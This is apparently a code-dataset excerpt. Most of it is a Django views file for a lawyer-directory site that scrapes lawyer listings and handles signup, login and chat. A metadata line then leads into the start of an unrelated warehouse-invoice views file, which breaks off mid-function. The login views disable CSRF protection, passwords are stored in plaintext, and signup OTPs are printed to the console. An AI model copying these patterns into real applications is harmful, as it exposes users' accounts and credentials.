Status code:\", response.status_code)\n\n return render(request,'navebar.html')\n\n\n\ndef webscrapdata(request):\n list1=[]\n list1.append(\"arbitration-lawyers\")\n list1.append(\"anticipatory-bail-lawyers\")\n list1.append(\"banking-finance-lawyers\")\n list1.append(\"bankruptcy-insolvency-lawyers\")\n list1.append(\"breach-of-contract-lawyers\")\n list1.append(\"civil-lawyers\")\n list1.append(\"corporate-lawyers\")\n list1.append(\"family-lawyers\")\n list1.append(\"criminal-lawyers\")\n list1.append(\"cyber-crime-lawyers\")\n list1.append(\"domestic-violence-lawyers\")\n list1.append(\"divorce-lawyers\")\n list1.append(\"muslim-law-lawyers\")\n list1.append(\"wills-trusts-lawyers\")\n list1.append(\"copyright-patent-trademark-lawyers\")\n list1.append(\"court-marriage-lawyers\")\n list1.append(\"domestic-violence-lawyers\")\n list1.append(\"gst-lawyers\")\n list1.append(\"immigration-lawyers\")\n list1.append(\"labour-service-lawyers\")\n list1.append(\"media-entertainment-lawyers\")\n list1.append(\"medical-negligence-lawyers\")\n list1.append(\"property-lawyers\")\n list1.append(\"rti-lawyers\")\n list1.append(\"armed-forces-tribunal-lawyers\")\n list1.append(\"consumer-court-lawyers\")\n cnt=0\n max_page=2\n for l1 in list1:\n base_url = f'https://lawrato.com/{l1}'\n cnt+=1\n page_number=1\n url = f'{base_url}?&page={page_number}'\n page_number+=1\n response = requests.get(url)\n if response.status_code == 200:\n soup = BeautifulSoup(response.text, 'html.parser')\n lawyer_listings = soup.find_all('div', class_='lawyer-item border-box')\n for lawyer in lawyer_listings:\n name = lawyer.find('h2', class_='media-heading').text.strip()\n location = lawyer.find('div', class_='location').text.strip()\n experience = lawyer.find('div', class_='experience').text.strip()\n image_url = lawyer.find('img', class_='media-object')['src']\n area_skill_div = lawyer.find('div', class_='area-skill')\n practice_area_skills = \"Criminal, Consumer Court\"\n if area_skill_div:\n div_contents = area_skill_div.find('div')\n if div_contents:\n practice_area_skills = div_contents.text.strip()\n rating = lawyer.find('span', class_='score').text.strip()\n advocate = Advocatefin(\n name=name,\n type=l1,\n location=location,\n experience=experience,\n rating=rating,\n image_url=image_url,\n practice_area_skills=practice_area_skills \n )\n print(name,type)\n # cat = Advocatecatagoryfin(cat=l1)\n # cat.save()\n # advocate.save()\n\n else:\n print(f\"Failed to retrieve the page for {l1}. 
Status code:\", response.status_code)\n\n return render(request,'navebar.html')\n\ndef webscrapdatapage2(request):\n list1=[]\n list1.append(\"arbitration-lawyers\")\n list1.append(\"anticipatory-bail-lawyers\")\n list1.append(\"banking-finance-lawyers\")\n list1.append(\"bankruptcy-insolvency-lawyers\")\n list1.append(\"breach-of-contract-lawyers\")\n list1.append(\"civil-lawyers\")\n list1.append(\"corporate-lawyers\")\n list1.append(\"family-lawyers\")\n list1.append(\"criminal-lawyers\")\n list1.append(\"cyber-crime-lawyers\")\n list1.append(\"domestic-violence-lawyers\")\n list1.append(\"divorce-lawyers\")\n list1.append(\"muslim-law-lawyers\")\n list1.append(\"wills-trusts-lawyers\")\n list1.append(\"copyright-patent-trademark-lawyers\")\n list1.append(\"court-marriage-lawyers\")\n list1.append(\"domestic-violence-lawyers\")\n list1.append(\"gst-lawyers\")\n list1.append(\"immigration-lawyers\")\n list1.append(\"labour-service-lawyers\")\n list1.append(\"media-entertainment-lawyers\")\n list1.append(\"medical-negligence-lawyers\")\n list1.append(\"property-lawyers\")\n list1.append(\"rti-lawyers\")\n list1.append(\"armed-forces-tribunal-lawyers\")\n list1.append(\"consumer-court-lawyers\")\n cnt=0\n max_page=2\n for l1 in list1:\n base_url = f'https://lawrato.com/{l1}'\n cnt+=1\n page_number=1\n url = f'{base_url}?&page={page_number}'\n page_number+=1\n response = requests.get(url)\n if response.status_code == 200:\n soup = BeautifulSoup(response.text, 'html.parser')\n lawyer_listings = soup.find_all('div', class_='lawyer-item border-box')\n for lawyer in lawyer_listings:\n name = lawyer.find('h2', class_='media-heading').text.strip()\n location = lawyer.find('div', class_='location').text.strip()\n experience = lawyer.find('div', class_='experience').text.strip()\n image_url = lawyer.find('img', class_='media-object')['src']\n area_skill_div = lawyer.find('div', class_='area-skill')\n practice_area_skills = \"Criminal, Consumer Court\"\n if area_skill_div:\n div_contents = area_skill_div.find('div')\n if div_contents:\n practice_area_skills = div_contents.text.strip()\n rating = lawyer.find('span', class_='score').text.strip()\n advocate = Advocatefin(\n name=name,\n type=l1,\n location=location,\n experience=experience,\n rating=rating,\n image_url=image_url,\n practice_area_skills=practice_area_skills \n )\n # cat = Advocatecatagoryfin(cat=l1)\n # cat.save()\n advocate.save()\n\n else:\n print(f\"Failed to retrieve the page for {l1}. 
Status code:\", response.status_code)\n\n return render(request,'navebar.html')\n\n\n\n\n\n\n\n\n\n\n\ndef arbitration_mediation_lawyers_data(request):\n # Define the URL you want to scrape\n url = 'https://www.leadindia.law/arbitration-and-mediation-lawyers'\n\n # Set a custom User-Agent header to mimic a real web browser\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'\n }\n\n # Create a session to manage cookies\n session = requests.Session()\n response = session.get(url, headers=headers)\n\n # Check if the request was successful (status code 200)\n if response.status_code == 200:\n # Parse the HTML content of the page\n soup = BeautifulSoup(response.text, 'html.parser')\n\n # Find all the lawyer listings within the specified class\n lawyer_listings = soup.find_all('div', class_='card shadow card-hover-shadow p-2')\n\n # Loop through all the lawyer listings\n for lawyer in lawyer_listings:\n # Extract lawyer's name\n name_element = lawyer.find('h6').find('a')\n name = name_element.text.strip() if name_element else None\n\n # Extract lawyer's rating\n rating_element = lawyer.find('li', class_='list-inline-item ms-0 h6 small fw-bold mb-0')\n rating = rating_element.text.strip() if rating_element else None\n\n # Extract lawyer's experience\n small_elements = lawyer.find_all('small')\n if len(small_elements) >= 3:\n experience = small_elements[0].get_text(strip=True)\n location = small_elements[1].get_text(strip=True)\n language = small_elements[2].get_text(strip=True)\n else:\n experience = location = language = None\n\n # Extract lawyer's practice areas\n practice_areas_element = lawyer.find('p', class_='p-0 m-0 h-75')\n practice_areas = practice_areas_element.text.strip() if practice_areas_element else None\n\n # Extract lawyer's contact link\n contact_link_element = lawyer.find('a', class_='btn btn-xs btn-dark')\n contact_link = contact_link_element['href'] if contact_link_element else None\n\n # Extract lawyer's photo URL\n photo_element = lawyer.find('img', class_='card-img')\n photo_url = photo_element['src'] if photo_element else None\n\n # # print or store the extracted information for each lawyer, including photo URL\n lawyer_instance =Aribitration_mediator(\n name=name,\n rating=rating,\n experience=experience,\n location=location,\n practice_areas=practice_areas,\n language=language,\n photo_url=photo_url,\n contact_link=contact_link\n )\n lawyer_instance.save()\n else:\n print(f\"Failed to retrieve the page. 
Status code:\", response.status_code)\n\n return render(request, 'navebar.html')\n\ndef accountcreate(request):\n try:\n return render(request, 'signup.html')\n except Exception as e:\n error_message = f\"An error occurred: {str(e)}\"\n return render(request, 'error_page.html', {'error_message': error_message})\n\ndef check_login(request):\n # {% if user.is_authenticated %} this can be used in frontend\n user=request.user\n # good to know this that fn exist for authentication\n if user.is_authenticated: \n return True\n else :\n return False\n \n@csrf_exempt\ndef signup(request):\n if request.method == \"POST\":\n try:\n username = request.POST['username']\n firstname = request.POST['fname']\n lastname = request.POST['lname']\n email = request.POST['email']\n pass1 = request.POST['password']\n type=Eitheruserlawyer(type=\"user\")\n otp = get_random_string(length=6, allowed_chars='0123456789')\n print(otp)\n # user.profile.otp = otp \n # user.profile.save()\n subject = 'Your OTP for Signup'\n message = f'Your OTP is {otp}. Enter this code to complete your signup.'\n from_email = 'shubhamkumar9264shu@gmail.com'\n to_email = email\n print(to_email)\n send_mail(subject, message, from_email, [to_email],fail_silently=True)\n \n\n\n\n\n\n\n\n\n\n\n type.save()\n myuser = User.objects.create_user(username, email, pass1)\n user_db = User_detail(eitheruserlawyer=type,user_detail_name=username, user_detail_email=email, user_detail_password=pass1)\n myuser.first_name = firstname\n myuser.last_name = lastname\n myuser.save()\n user_db.save()\n user = authenticate(username=username, password=pass1)\n user_status = 1\n user_d = request.user\n obj = Blog.objects.all()\n lawyer=Laweruser.objects.all()\n # # # lawyer=Lawyer.objects.all()\n context = {\n 'obj': obj,\n \"user_d\": user_d,\n \"user_status\": user_status,\n 'lawyer':lawyer\n }\n \n if user is not None:\n login(request, user)\n id1 = user.id\n names_to_exclude = [\"Advocate Raman Jain\",\"Advocate Hemant Kumar Joshi\"]\n distinct_names = Advocatefin.objects.exclude(name__in=names_to_exclude).values('name').distinct().order_by('-rating')[:6]\n advocates_list = []\n\n for name_dict in distinct_names:\n name = name_dict['name']\n advocate = Advocatefin.objects.filter(name=name).first() # Assuming there's only one advocate with a given name\n if advocate:\n advocates_list.append(advocate)\n # # print(type(advocates))\n # print(advocates_list)\n # 'Lawyers': advocates\n context['Lawyers']=advocates_list\n \n return render(request, 'index2.html', context)\n else:\n return render(request, 'loginpage.html')\n except IntegrityError:\n error_message = \"Username or email already taken. 
Please choose a different username or email.\"\n return render(request, 'signup.html', {'error_message': error_message})\n except Exception as e:\n error_message = f\"An error occurred: {str(e)}\"\n return render(request, 'error_page.html', {'error_message': error_message})\n else:\n return render(request, 'signup.html')\n@csrf_exempt\ndef signuplawyer(request):\n if request.method == \"POST\":\n try:\n username = request.POST['username']\n firstname = request.POST['fname']\n lastname = request.POST['lname']\n email = request.POST['email']\n pass1 = request.POST['password']\n type=Eitheruserlawyer(type=\"lawyer\")\n type.save()\n myuser = User.objects.create_user(username, email, pass1)\n user_db = User_detail(eitheruserlawyer=type,user_detail_name=username, user_detail_email=email, user_detail_password=pass1)\n myuser.first_name = firstname\n myuser.last_name = lastname\n extradetaillawer=Extradetaillawer.objects.filter(pk=1)\n laweruser=Laweruser(eitheruserlawyer=type,extradetaillawer=extradetaillawer[0],name=username,fname=firstname,lname=lastname,email=email, password=pass1)\n myuser.save()\n user_db.save()\n laweruser.save()\n typelawyer=Typelawer(laweruser=laweruser)\n typelawyer.save()\n user = authenticate(username=username, password=pass1)\n user_status = 1\n user_d = request.user\n obj = Blog.objects.all()\n # # lawyer=Lawyer.objects.all()\n lawyer=Laweruser.objects.all()\n context = {\n 'obj': obj,\n \"user_d\": user_d,\n \"user_status\": user_status,\n # 'lawyer':lawyer,\n 'lawyer':lawyer\n }\n \n if user is not None:\n login(request, user)\n id1 = user.id\n distinct_names = Advocatefin.objects.values('name').distinct()[:6]\n advocates = Advocatefin.objects.filter(name__in=Subquery(distinct_names))\n # 'Lawyers': advocates\n names_to_exclude = [\"Advocate Raman Jain\",\"Advocate Hemant Kumar Joshi\"]\n distinct_names = Advocatefin.objects.exclude(name__in=names_to_exclude).values('name').distinct().order_by('-rating')[:6]\n advocates_list = []\n\n for name_dict in distinct_names:\n name = name_dict['name']\n advocate = Advocatefin.objects.filter(name=name).first() # Assuming there's only one advocate with a given name\n if advocate:\n advocates_list.append(advocate)\n # # print(type(advocates))\n # print(advocates_list)\n # 'Lawyers': advocates\n context['Lawyers']=advocates_list\n \n return render(request, 'index2.html', context)\n else:\n return render(request, 'loginpage.html')\n except IntegrityError:\n error_message = \"Username or email already taken. 
Please choose a different username or email.\"\n return render(request, 'signuplawer.html', {'error_message': error_message})\n except Exception as e:\n error_message = f\"An error occurred: {str(e)}\"\n return render(request, 'error_page.html', {'error_message': error_message})\n else:\n return render(request, 'signuplawer.html')\n\n@login_required\ndef upload_photo(request):\n if request.method == 'POST' and 'profile_photo' in request.FILES:\n user_profile = UserProfilePhoto.objects.get_or_create(user=request.user)[0]\n user_profile.photo = request.FILES['profile_photo']\n user_profile.save()\n return redirect('profile') \n@csrf_exempt\ndef loginuser(request):\n if request.method == \"POST\":\n try:\n user_d = request.user\n username = request.POST['username']\n pass1 = request.POST['password']\n \n user = authenticate(username=username, password=pass1)\n \n if user is not None:\n login(request, user)\n id1 = user.id\n user_status = 1\n obj = Blog.objects.all()\n # # lawyer=Lawyer.objects.all()\n lawyer=Laweruser.objects.all()\n # print(lawyer)\n context = {\n 'obj': obj,\n 'user_d': user_d,\n 'user_status': user_status,\n # 'lawyer':lawyer,\n 'lawyer':lawyer\n }\n names_to_exclude = [\"Advocate Raman Jain\",\"Advocate Hemant Kumar Joshi\"]\n distinct_names = Advocatefin.objects.exclude(name__in=names_to_exclude).values('name').distinct().order_by('-rating')[:6]\n advocates_list = []\n\n for name_dict in distinct_names:\n name = name_dict['name']\n advocate = Advocatefin.objects.filter(name=name).first() # Assuming there's only one advocate with a given name\n if advocate:\n advocates_list.append(advocate)\n # # print(type(advocates))\n # print(advocates_list)\n # 'Lawyers': advocates\n context['Lawyers']=advocates_list\n return render(request, 'index2.html', context)\n else:\n error_message = \"Invalid username or password.\"\n return render(request, 'loginpage.html', {'error_message': error_message})\n except Exception as e:\n error_message = f\"An error occurred: {str(e)}\"\n return render(request, 'error_page.html', {'error_message': error_message})\n else:\n return render(request, 'loginpage.html')\n\n@csrf_exempt\ndef logoutuser(request):\n try:\n # # lawyer=Lawyer.objects.all()\n lawyer=Laweruser.objects.all()\n logout(request)\n context = {\n # 'lawyer':lawyer,\n 'lawyer':lawyer\n }\n names_to_exclude = [\"Advocate Raman Jain\",\"Advocate Hemant Kumar Joshi\"]\n distinct_names = Advocatefin.objects.exclude(name__in=names_to_exclude).values('name').distinct().order_by('-rating')[:6]\n advocates_list = []\n\n for name_dict in distinct_names:\n name = name_dict['name']\n advocate = Advocatefin.objects.filter(name=name).first() # Assuming there's only one advocate with a given name\n if advocate:\n advocates_list.append(advocate)\n # # print(type(advocates))\n # print(advocates_list)\n # 'Lawyers': advocates\n context['Lawyers']=advocates_list\n return render(request, 'index2.html',context)\n \n except Exception as e:\n error_message = f\"An error occurred: {str(e)}\"\n return render(request, 'error_page.html', {'error_message': error_message})\n \n return render(request, 'loginpage.html')\n@csrf_exempt\ndef index(request):\n # return render(request,'dummychat.html')\n # # lawyer=Lawyer.objects.all()\n lawyer=Laweruser.objects.all()\n # logout(request)\n context = {\n # 'lawyer':lawyer,\n 'lawyer':lawyer\n }\n # names_to_exclude = [\"Advocate Raman Jain\",\"Advocate Hemant Kumar Joshi\"]\n # distinct_names = 
Advocatefin.objects.exclude(name__in=names_to_exclude).values('name').distinct().order_by('-rating')[:6]\n # # print(distinct_names)\n # advocates_list = []\n # # ad=Advocatefin.objects.all()\n # # # print(len(ad))\n\n # for name_dict in distinct_names:\n # name = name_dict['name']\n # advocate = Advocatefin.objects.filter(name=name).first() # Assuming there's only one advocate with a given name\n # if advocate:\n # advocates_list.append(advocate)\n # # print(type(advocates))\n # # print(advocates_list)\n # 'Lawyers': advocates\n advocates_list=Advocatefin.objects.all()\n adv1=[]\n cnt=0\n for l1 in advocates_list:\n adv1.append(l1)\n cnt+=1\n if cnt==6:\n break\n context['Lawyers']=adv1\n # return render(request, 'index2.html',context)\n try:\n if request.user.is_authenticated:\n return render(request, 'index2.html')\n else:\n return render(request, 'signup.html')\n except Exception as e:\n error_message = f\"An error occurred: {str(e)}\"\n return render(request, 'error_page.html', {'error_message': error_message})\n \n@csrf_exempt\ndef home(request):\n # # lawyer=Lawyer.objects.all()\n lawyer=Laweruser.objects.all()\n # logout(request)\n context = {\n # 'lawyer':lawyer,\n 'lawyer':lawyer\n }\n advocates_list=Advocatefin.objects.all()\n adv1=[]\n cnt=0\n for l1 in advocates_list:\n adv1.append(l1)\n cnt+=1\n if cnt==6:\n break\n context['Lawyers']=adv1\n return render(request, 'index2.html',context)\n\n@csrf_exempt\ndef carousel(request):\n try:\n if request.user.is_authenticated:\n context = {}\n return render(request, 'carousel.html', context)\n else:\n return render(request, 'signup.html')\n except Exception as e:\n error_message = f\"An error occurred: {str(e)}\"\n return render(request, 'error_page.html', {'error_message': error_message})\n\ndef blog(request):\n try:\n if request.method == \"GET\":\n obj = Blog.objects.all()\n sz=len(obj)\n advocates = Advocatefin.objects.all()[:sz]\n ziped_list=list(zip(obj,advocates))\n # # print(ziped_list)\n # # print(advocates)\n # print(obj)\n context = {'obj': obj,'advocates':advocates,'ziped_list':ziped_list}\n return render(request, 'blog.html', context)\n except Exception as e:\n error_message = f\"An error occurred: {str(e)}\"\n return render(request, 'error_page.html', {'error_message': error_message})\n \n\n\ndef chatPage(request, *args, **kwargs):\n try:\n if not request.user.is_authenticated:\n return redirect(\"login-user\")\n \n context = {}\n return render(request, \"chatage.html\", context)\n except Exception as e:\n error_message = f\"An error occurred: {str(e)}\"\n return render(request, 'error_page.html', {'error_message': error_message})\n\ndef chat_with_user(request, recipient_username):\n return render(request, 'chatpage.html', {\n 'recipient_username': recipient_username})\n\n@csrf_exempt\ndef chat(request,receiver_id):\n if request.method == \"POST\":\n pass\n else : \n chat_request = ChatRequest.objects.get(pk=receiver_id)\n pass\n return render(request,'navebar.html')\n\n\n\n \n \n \n\n\ndef readmore(request, id1, id2):\n try:\n\n if request.method == \"GET\":\n \n obj = Blog.objects.filter(pk=id1)\n lawyer=Advocatefin.objects.filter(pk=id2)\n context = {\n 'obj': obj[0],\n 'lawyer':lawyer[0]\n }\n blog = Blog.objects.all()[:4]\n \n sz=len(blog)\n # print(sz)\n # print(blog)\n advocates = Advocatefin.objects.all()[:sz]\n # print(advocates)\n ziped_list=list(zip(blog,advocates))\n # print(ziped_list)\n # print(len(ziped_list))\n context['ziped_list']=ziped_list\n return render(request, 'blogafteropen.html', context)\n 
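# NOTE: any failure above (missing Blog/Advocatefin rows, bad ids,
    # ragged zip of blogs and advocates) drops into the handler below
    # and renders the shared error page
    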
except Exception as e:\n error_message = f\"An error occurred: {str(e)}\"\n return render(request, 'error_page.html', {'error_message': error_message})\n\ndef dashboard(request):\n try:\n # # print(request.user.username)\n # user=User_detail.objects.filter(pk=request.user.id)\n # # print(user)\n # return render(request,'navebar.html')\n return render(request, 'profile.html')\n except Exception as e:\n error_message = f\"An error occurred: {str(e)}\"\n return render(request, 'error_page.html', {'error_message': error_message})\n\ndef setting(request):\n try:\n return render(request, 'profile.html')\n except Exception as e:\n error_message = f\"An error occurred: {str(e)}\"\n return render(request, 'error_page.html', {'error_message': error_message})\n \ndef lawyer(request,id1):\n try:\n # return render(request,'navebar.html')\n lawyer=Laweruser.objects.filter(pk=id1)\n \n context={\n 'lawyer':lawyer[0],\n }\n # print(lawyer)\n # return render(request,'navebar.html')\n \n \n return render(request, 'lawyer.html',context)\n except Exception as e:\n error_message = f\"An error occurred: {str(e)}\"\n return render(request, 'error_page.html', {'error_message': error_message})\n \ndef send_chat_request(request,receiver_id):\n try:\n receiver = Extradetaillawer.objects.get(pk=receiver_id)\n chat_request=ChatRequest(sender=request.user,receiver=receiver)\n chat_request.save()\n messages.success(request, 'abhi accept nhi hua hai')\n lawyer=Extradetaillawer.objects.filter(pk=receiver_id)\n # print(lawyer)\n chatrequest=ChatRequest.objects.filter(receiver=lawyer[0])\n cnt=len(chatrequest)\n # print(cnt)\n context={\n 'lawyer':lawyer[0],\n 'cnt':cnt\n }\n if cnt!=0:\n context['chatrequest']=chatrequest[0]\n # print(context)\n # return render(request,'navebar.html')\n return render(request, 'lawyer.html',context)\n except Exception as e:\n error_message = f\"An error occurred: {str(e)}\"\n return render(request, 'error_page.html', {'error_message': error_message})\n\n\n\n\ndef accept_chat_request(request, request_id):\n try:\n chat_request = ChatRequest.objects.get(pk=request_id)\n chat_request.accepted = True\n chat_request.save()\n return redirect('chat', chat_request.receiver.id)\n except Exception as e:\n # print(str(e)) \n \n return render(request, 'error.html', {'error_message': 'An error occurred while processing your request'})\n\n\n@login_required\ndef rooms(request):\n rooms = Room.objects.all()\n\n return render(request, 'room/rooms.html', {'rooms': rooms})\n\n@login_required\ndef room(request, id1,id2):\n room = Room.objects.get(pk=id2)\n lawyer=Laweruser.objects.filter(pk=id1)\n # print(lawyer)\n room=lawyer[0].room\n messages = Message.objects.filter(room=room)[0:25]\n \n \n context={\n 'lawyer':lawyer[0],\n 'messages':messages\n }\n \n # return render(request,'navebar.html')\n \n \n return render(request, 'room.html',context)\n\n # return render(request, 'room.html', {'room': room, 'messages': messages})\n\ndef typelawyer(request,type):\n type=Typelawer.objects.filter(type=type)\n cnt=len(type)\n context={\n 'type':type,\n 'cnt':cnt\n }\n \n return render(request,'filteradvocate.html',context)\n\ndef update(request,id1):\n # write logic baad me not in priority\n try:\n # # print(request.user.username)\n # user=User_detail.objects.filter(pk=request.user.id)\n # # print(user)\n # return render(request,'navebar.html')\n # if request.method==\"POST\":\n # User.username=request.user.username\n # User.email=request.POST['email']\n # User.first_name=request.POST['first_name']\n # 
User.last_name=request.POST['last_name']\n # User.save()\n \n return render(request, 'profile.html')\n except Exception as e:\n error_message = f\"An error occurred: {str(e)}\"\n return render(request, 'error_page.html', {'error_message': error_message})\n\n\n\n\ndef consult(request):\n try:\n return render(request, 'problem.html')\n except Exception as e:\n error_message = f\"An error occurred: {str(e)}\"\n return render(request, 'error.html', {'error_message': error_message})\n\n\n\n\ndef submitproblem(request):\n try:\n if request.method == \"POST\":\n city = request.POST.get('city', '')\n problem = request.POST.get('problem', '')\n # print(city)\n # print(problem)\n if not city or not problem:\n error_message = \"Both 'city' and 'problem' are required.\"\n return render(request, 'problem.html', {'error_message': error_message})\n\n user_message = problem\n res = fn(request)\n user_message += \" \"\n user_message += res\n # print(user_message)\n\n gpt3_response = get_gpt3_response(user_message)\n gpt3_response = gpt3_response.lower()\n item = lawerexactmatch(request)\n lawyeritem = lawerecatagoryexactmatch(request)\n ans = \"\"\n ind = 0\n\n for i1 in item:\n if gpt3_response.find(i1) != -1:\n ans = lawyeritem[ind]\n break\n ind += 1\n\n # print(ans)\n\n if len(ans) == 0:\n ans += \"criminal-lawyers\"\n advocates = Advocatefin.objects.filter(type=ans)\n\n return render(request, 'lawyerCard.html', {'Lawyers': advocates})\n \n except Exception as e:\n error_message = f\"An error occurred: {str(e)}\"\n return render(request, 'error.html', {'error_message': error_message}, status=500)\n \n return render(request, 'problem.html')\n\n # return render(request, 'your_form_template.html')\n\n\ndef advocates_by_type(request, advocate_type):\n advocates = Advocatefin.objects.filter(type=advocate_type)\n return render(request, 'lawyerCard.html', {'Lawyers': advocates})\ndef advocates_by_id(request,id1):\n advocates = Advocatefin.objects.filter(pk=id1)\n for l in advocates:\n l.type=l.practice_area_skills\n return render(request, 'lawyerCard.html', {'Lawyers': advocates})\n\n\ndef searchlawyer(request):\n # print(-1)\n if request.method == \"POST\":\n search_query = request.POST.get(\"searchval\")\n # print(search_query)\n advocates = Advocatefin.objects.filter(name__icontains=search_query)\n context={\n\n }\n if len(advocates) ==0:\n context['Lawyers']=advocates\n context['cn']=len(advocates)\n else:\n l11=[]\n l11.append(advocates[0])\n context['Lawyers']=l11\n context['cn']=len(advocates)\n\n \n \n return render(request, 'lawyerCard.html', context)\n else:\n lawyer=Laweruser.objects.all()\n\n # logout(request)\n context = {\n # 'lawyer':lawyer,\n 'lawyer':lawyer\n\n }\n names_to_exclude = [\"Advocate Raman Jain\",\"Advocate Hemant Kumar Joshi\"]\n distinct_names = Advocatefin.objects.exclude(name__in=names_to_exclude).values('name').distinct().order_by('-rating')[:6]\n advocates_list = []\n\n for name_dict in distinct_names:\n name = name_dict['name']\n advocate = Advocatefin.objects.filter(name=name).first() # Assuming there's only one advocate with a given name\n if advocate:\n advocates_list.append(advocate)\n # # print(type(advocates))\n # # print(advocates_list)\n # 'Lawyers': advocates\n context['Lawyers']=advocates_list\n context['cn']=5\n return render(request, 'index2.html',context)\n \n\ndef somebestadvocates(request):\n\n lawyer=Laweruser.objects.all()\n # logout(request)\n context = {\n # 'lawyer':lawyer,\n 'lawyer':lawyer\n }\n names_to_exclude = [\"Advocate Raman Jain\",\"Advocate 
Hemant Kumar Joshi\"]\n distinct_names = Advocatefin.objects.exclude(name__in=names_to_exclude).values('name').distinct().order_by('-rating')[:6]\n advocates_list = []\n\n for name_dict in distinct_names:\n name = name_dict['name']\n advocate = Advocatefin.objects.filter(name=name).first() \n if advocate:\n advocates_list.append(advocate)\n\n # # print(type(advocates))\n # # print(advocates_list)\n # 'Lawyers': advocates\n context['Lawyers']=advocates_list\n return render(request, 'somebestadvocates.html',context)\n\ndef Arbitrators_Mediators(request):\n try:\n advocates = Aribitration_mediator.objects.all()\n return render(request, 'Arbitrators_Mediators.html', {'Lawyers': advocates})\n except Aribitration_mediator.DoesNotExist:\n return render(request, 'error.html', {'error_message': 'No lawyers found.'})\n except Exception as e:\n return render(request, 'error.html', {'error_message': f\"An error occurred: {e}\"})\n\n\n\n\n \n\n\n\n \n \n\n\n\n\n\n\n","repo_name":"Shubhamkumarroy/LawFirm","sub_path":"myprojectapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":41361,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"16312385505","text":"from django.shortcuts import reverse, redirect, render, get_object_or_404\nfrom django.urls import reverse_lazy\nfrom django.views.generic import ListView, UpdateView, CreateView\nfrom django.utils.decorators import method_decorator\nfrom django.contrib.admin.views.decorators import staff_member_required\nfrom django.db.models import Sum\nfrom django.contrib import messages\nfrom .models import Invoice, InvoiceOrderItem, InvoiceImage, VendorPaycheck\nfrom catalogue.models import Product\nfrom catalogue.product_details import Vendor\nfrom catalogue.forms import VendorForm\nfrom site_settings.constants import CURRENCY\nfrom .forms import CreateInvoiceForm, UpdateInvoiceForm, CreateOrderItemForm, InvoiceImageForm, CopyInvoiceForm, InvoiceAttributeCreateOrEditForm\nfrom .tables import InvoiceImageTable, InvoiceTable, VendorTable, ProductAddTable, VendorOrderTable, VendorProductReportTable, VendorWarehouseMovementTable\n\nfrom django_tables2 import RequestConfig\n\n\n@method_decorator(staff_member_required, name='dispatch')\nclass WarehouseOrderList(ListView):\n model = Invoice\n template_name = 'dashboard/list_page.html'\n paginate_by = 50\n\n def get_queryset(self):\n queryset = Invoice.objects.all()\n queryset = Invoice.filter_data(self.request, queryset)\n return queryset\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n queryset_table = InvoiceTable(self.object_list)\n RequestConfig(self.request).configure(queryset_table)\n vendors = Vendor.objects.filter(active=True)\n vendor_filter = True\n page_title, create_url, back_url = 'Τιμολόγια', reverse('warehouse:create_invoice'), reverse('warehouse:dashboard')\n context.update(locals())\n return context\n\n\n@staff_member_required\ndef create_warehouse_order_view(request):\n form = CreateInvoiceForm(request.POST or None)\n form_title = 'Create New Invoice'\n back_url = reverse('warehouse:invoices')\n if form.is_valid():\n instance = form.save()\n return redirect(instance.get_edit_url())\n\n return render(request, 'dashboard/form.html', locals())\n\n\n@method_decorator(staff_member_required, name='dispatch')\nclass UpdateWarehouseOrderView(UpdateView):\n model = Invoice\n template_name = 'warehouse/order_detail.html'\n form_class = UpdateInvoiceForm\n success_url = 
reverse_lazy('warehouse:invoices')\n\n def get_success_url(self):\n return reverse('warehouse:update_order', kwargs={'pk':self.kwargs['pk']})\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n back_url = reverse('warehouse:invoices')\n if self.object.order_type in ['4', '5']:\n qs = Product.my_query.active_warehouse()\n else:\n qs = Product.my_query.active().filter(vendor=self.object.vendor)\n products_table = ProductAddTable(qs)\n instance = self.object\n images = InvoiceImage.objects.filter(order_related=self.object)\n images_table = InvoiceImageTable(images)\n RequestConfig(self.request).configure(images_table)\n RequestConfig(self.request).configure(products_table)\n context.update(locals())\n return context\n\n\n@staff_member_required\ndef check_if_product_have_attr_view(request, pk, dk):\n product = get_object_or_404(Product, id=dk)\n instance = get_object_or_404(Invoice, id=pk)\n qs = InvoiceOrderItem.objects.filter(order=instance, product=product)\n if qs.exists():\n messages.warning(request, 'Η καταχώρηση υπάρχει ήδη.')\n return redirect(instance.get_edit_url())\n if product.have_attr:\n return redirect(reverse('warehouse:create_order_item_with_attr', kwargs={'pk': pk, 'dk': dk}))\n return redirect(reverse('warehouse:create-order-item', kwargs={'pk': pk, 'dk': dk}))\n\n\n@staff_member_required\ndef create_order_item_with_attribute_view(request, pk, dk):\n instance = get_object_or_404(Invoice, id=pk)\n product = get_object_or_404(Product, id=dk)\n\n attr_qs = product.attr_class.filter(class_related__have_transcations=True)\n attr_class = attr_qs.first() if attr_qs.exists() else None\n class_attribute = attr_qs.first().class_related if attr_qs.exists() else None\n class_items = class_attribute.my_values.all()\n\n qs_order_item = InvoiceOrderItem.objects.filter(order=instance, product=product)\n\n order_item_qs = InvoiceOrderItem.objects.filter(product=product, order=instance)\n order_item = order_item_qs.first() if order_item_qs.exists() else None\n selected_data = order_item.my_attributes.all() if order_item else []\n # form data\n form = InvoiceAttributeCreateOrEditForm(initial={'value': product.price_buy,\n 'discount': product.order_discount,\n 'measure_unit': product.measure_unit,\n 'order_code': product.order_code\n })\n form_data = (order_item.value, order_item.discount_value) if order_item else (0, 0)\n return render(request, 'dashboard/form_with_attr.html', context=locals())\n\n\n@method_decorator(staff_member_required, name='dispatch')\nclass CreateOrderItem(CreateView):\n model = InvoiceOrderItem\n form_class = CreateOrderItemForm\n template_name = 'dashboard/form.html'\n\n def get_success_url(self):\n return reverse('warehouse:update_order', kwargs={'pk': self.kwargs['pk']})\n\n def get_initial(self):\n self.instance = get_object_or_404(Invoice, id=self.kwargs['pk'])\n self.product = get_object_or_404(Product, id=self.kwargs['dk'])\n initial = super().get_initial()\n initial['order'] = self.instance\n initial['product'] = self.product\n initial['sku'] = self.product.order_code\n initial['value'] = self.product.price_buy\n initial['discount_value'] = self.product.order_discount\n return initial\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n form_title = f'Add {self.product} to {self.instance}'\n back_url, delete_url = self.get_success_url(), None\n context.update(locals())\n return context\n\n def form_valid(self, form):\n form.save()\n return 
